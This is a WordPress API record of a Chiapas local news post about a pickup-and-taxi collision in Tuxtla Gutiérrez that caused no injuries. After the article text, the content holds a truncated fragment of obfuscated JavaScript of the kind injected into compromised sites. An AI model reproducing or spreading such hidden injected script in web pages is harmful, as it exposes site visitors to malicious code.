{"id":14639,"date":"2024-03-13T02:14:51","date_gmt":"2024-03-13T02:14:51","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14639"},"modified":"2024-03-13T02:14:52","modified_gmt":"2024-03-13T02:14:52","slug":"camioneta-y-taxi-chocan-en-nino-de-atocha","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14639","title":{"rendered":"Camioneta y taxi chocan en Ni\u00f1o de Atocha"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1710296031843-1024x576.jpg\" alt=\"\" class=\"wp-image-14640\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1710296031843-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1710296031843-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1710296031843-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1710296031843.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 12 de marzo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este martes por la ma\u00f1ana se registr\u00f3 un accidente de tr\u00e1nsito entre una camioneta Nissan tipo estaquitas y un Chevrolet Aveo en la modalidad de taxi con n\u00famero econ\u00f3mico 3891 a la altura de la 6a Norte y 6a Poniente.El conductor de la camioneta dio a conocer que, se desplazaba de Sur a Norte sobre la 6a Poniente cuando fue impactada por el taxi.Por el golpe, la camioneta sali\u00f3 volando y termin\u00f3 contra la banqueta.A pesar de lo aparatoso del accidente no hubo lesionados.Al no aceptar nadie la responsabilidad, las dos unidades fueron puestos a disposici\u00f3n del Ministerio P\u00fablico para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 12 de marzo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este martes por la ma\u00f1ana se registr\u00f3 un accidente de tr\u00e1nsito entre una camioneta Nissan tipo estaquitas y un Chevrolet Aveo en la modalidad de taxi con n\u00famero econ\u00f3mico 3891 a la altura de la 6a Norte y 6a Poniente.El conductor de la camioneta &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14640,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-14639","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14639","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14639"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14639\/revisions"}],"predecessor-version":[{"id":14641,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14639\/revisions\/14641"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14640"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14639"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14639"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14639"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}